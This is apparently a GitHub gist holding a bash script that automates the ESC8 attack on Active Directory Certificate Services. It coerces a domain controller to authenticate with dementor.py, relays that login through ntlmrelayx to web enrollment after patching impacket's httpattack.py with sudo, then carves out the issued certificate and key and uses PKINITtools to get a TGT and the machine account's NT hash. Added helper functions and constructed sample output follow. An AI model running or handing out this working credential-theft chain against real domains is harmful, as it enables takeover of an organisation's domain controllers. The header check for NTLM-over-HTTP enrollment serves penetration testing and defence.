@snovvcrash
Last active February 4, 2022 18:16
Automate the process of exploiting ESC8 with PKINITtools
: << 'comment'
Usage (run from the PKINITtools checkout; the script swaps a patched httpattack.py in for the
one installed with impacket, so it needs sudo for the copy, and restores the original on exit):
$ git clone https://github.com/dirkjanm/PKINITtools && cd PKINITtools
$ cme ldap megacorp.local -u snovvcrash -p 'Passw0rd!' -M adcs
$ bash ADCS_ESC8_PKINITtools.sh CA01.megacorp.local DC1 KerberosAuthentication
$ python dementor.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local 10.10.13.37 DC1.megacorp.local
The cme module lists the CA and its templates; the dementor.py call goes in a second terminal
once ntlmrelayx is listening, and coerces DC1 to authenticate to the attacker host (10.10.13.37).
Arguments: <CA FQDN> <machine account to relay, no trailing $> <certificate template>
comment
if [ "$#" -ne 3 ]; then
    echo "Usage: bash $0 <CA FQDN> <machine account, no trailing \$> <template>" >&2
    exit 1
fi
CA_FQDN="$1"
DA="$2"             # machine account whose authentication is relayed (the coerced DC), e.g. DC1
TEMPLATE="$3"       # template that allows client authentication, e.g. KerberosAuthentication
DOMAIN="${CA_FQDN#*.}"    # CA01.megacorp.local -> megacorp.local
CA="${CA_FQDN%%.*}"       # CA01.megacorp.local -> CA01
# The httpattack.py that ntlmrelayx.py loads from the installed impacket package.
HTTPATTACK_PATH="$(python3 -c 'import os, impacket; print(os.path.dirname(impacket.__file__))')/examples/ntlmrelayx/attacks/httpattack.py"
# Put both original files back on any exit, including Ctrl+C or an error half-way through.
restore() {
    [ -f "${HTTPATTACK_PATH}.bak" ] && sudo mv "${HTTPATTACK_PATH}.bak" "${HTTPATTACK_PATH}"
    [ -f ntlmrelayx/httpattack.py.bak ] && mv ntlmrelayx/httpattack.py.bak ntlmrelayx/httpattack.py
}
trap restore EXIT
# PKINITtools' httpattack.py hardcodes the domain and template; patch them in, then swap it in for impacket's module.
cp ntlmrelayx/httpattack.py ntlmrelayx/httpattack.py.bak
sed -i "s/testsegment.local/${DOMAIN}/g" ntlmrelayx/httpattack.py
sed -i "s/DomainController/${TEMPLATE}/g" ntlmrelayx/httpattack.py
sudo cp "${HTTPATTACK_PATH}" "${HTTPATTACK_PATH}.bak"
sudo cp ntlmrelayx/httpattack.py "${HTTPATTACK_PATH}"
# Relay the coerced authentication to web enrollment; blocks until ntlmrelayx is stopped (Ctrl+C once the certificate is issued).
ntlmrelayx.py -t "http://${CA_FQDN}/certsrv/certfnsh.asp" -smb2support --no-wcf-server | tee ntlmrelayx.out
# The patched module prints the issued certificate and its key as PEM; carve them out of the log.
sed -n '/-----BEGIN CERTIFICATE-----/,/-----END CERTIFICATE-----/p' ntlmrelayx.out > cert.pem
sed -n '/-----BEGIN RSA PRIVATE KEY-----/,/-----END RSA PRIVATE KEY-----/p' ntlmrelayx.out > privatekey.pem
if [ ! -s cert.pem ] || [ ! -s privatekey.pem ]; then
    echo "[-] No certificate found in ntlmrelayx.out, nothing to authenticate with" >&2
    exit 1
fi
sleep 15
# PKINIT with the certificate gets a TGT for the machine account and prints the AS-REP encryption key ...
python3 gettgtpkinit.py "${DOMAIN}/${DA}\$" -cert-pem cert.pem -key-pem privatekey.pem "${CA}.ccache" | tee gettgtpkinit.out
# ... which getnthash.py needs to decrypt the PAC credential info and recover the account's NT hash.
KEY="$(grep -oE '[0-9a-f]{64}' gettgtpkinit.out | head -n 1)"
KRB5CCNAME="${CA}.ccache" python3 getnthash.py "${DOMAIN}/${DA}\$" -key "${KEY}"
#rm ntlmrelayx.out cert.pem privatekey.pem gettgtpkinit.out
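Three checks a practitioner wants around the script above, written here as an added bash example that is not code from the gist, from impacket or from PKINITtools: carving the PEM blocks out of the ntlmrelayx log, isolating the AS-REP key from gettgtpkinit.py output even when a logging prefix shares the line, and a header test for the ESC8 precondition that /certsrv/ offers NTLM over plain HTTP. Every sample string (relay log, gettgtpkinit output, HTTP response headers) is constructed for the example, and the PEM bodies and key value are placeholders, not real material.

```bash
#!/usr/bin/env bash
# Added helper functions for the ESC8 workflow above. They are not part of the
# gist or of PKINITtools/impacket; all sample output below is constructed.

# Carve the first PEM block of the given type ("CERTIFICATE", "RSA PRIVATE KEY")
# out of mixed log output, such as a saved ntlmrelayx session, read from stdin.
extract_pem() {
    awk -v kind="$1" '
        $0 == ("-----BEGIN " kind "-----") { inblock = 1 }
        inblock                            { print }
        $0 == ("-----END " kind "-----")   { exit }
    '
}

# gettgtpkinit.py logs the AS-REP encryption key as 64 hex characters (AES-256).
# grep -o isolates it from any logging prefix on the same line, so the value is
# safe to pass to getnthash.py -key.
extract_asrep_key() {
    grep -oE '[0-9a-f]{64}' | head -n 1
}

# ESC8 precondition: web enrollment answers an unauthenticated request with 401
# and offers NTLM (directly, or wrapped in Negotiate) over plain HTTP. Reads raw
# response headers, e.g. from `curl -sI http://CA01.megacorp.local/certsrv/`, and
# returns 0 when they look relayable. Heuristic only: it says nothing about
# whether the HTTPS listener also accepts NTLM without Extended Protection.
ntlm_enrollment_offered() {
    local headers status
    headers="$(tr -d '\r')"
    status="$(printf '%s\n' "$headers" | head -n 1 | awk '{ print $2 }')"
    [ "$status" = "401" ] || return 1
    printf '%s\n' "$headers" | grep -iqE '^WWW-Authenticate: *(NTLM|Negotiate)'
}

# Constructed sample data (not real tool output).
SAMPLE_RELAY_OUTPUT='[*] HTTPD: Received connection from 10.10.13.37, attacking target http://CA01.megacorp.local
-----BEGIN CERTIFICATE-----
MIIBsampleCertLine1
MIIBsampleCertLine2
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIIEsampleKeyLine1
-----END RSA PRIVATE KEY-----'

SAMPLE_TGT_OUTPUT='INFO:minikerberos:Requesting TGT with certificate
INFO:minikerberos:AS-REP encryption key (you might need this later):
INFO:minikerberos:3f3d7c5e4a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d
INFO:minikerberos:Saved TGT to file'

SAMPLE_VULN_HEADERS='HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 1293'

SAMPLE_HARDENED_HEADERS='HTTP/1.1 301 Moved Permanently
Location: https://CA01.megacorp.local/certsrv/
Content-Length: 0'

demo() {
    printf '%s\n' "$SAMPLE_RELAY_OUTPUT" | extract_pem CERTIFICATE
    printf 'AS-REP key: %s\n' "$(printf '%s\n' "$SAMPLE_TGT_OUTPUT" | extract_asrep_key)"
    if printf '%s\n' "$SAMPLE_VULN_HEADERS" | ntlm_enrollment_offered; then
        echo "certsrv offers NTLM over HTTP: ESC8 candidate"
    else
        echo "certsrv does not offer NTLM over HTTP"
    fi
}
demo
```

In the real workflow the functions take `ntlmrelayx.out`, `gettgtpkinit.out` and the output of `curl -sI http://<CA FQDN>/certsrv/` on stdin instead of the constructed samples; the header check is worth running before coercing anything, since a CA that redirects plain HTTP to HTTPS, or that no longer offers NTLM, will not give the relay anything to work with.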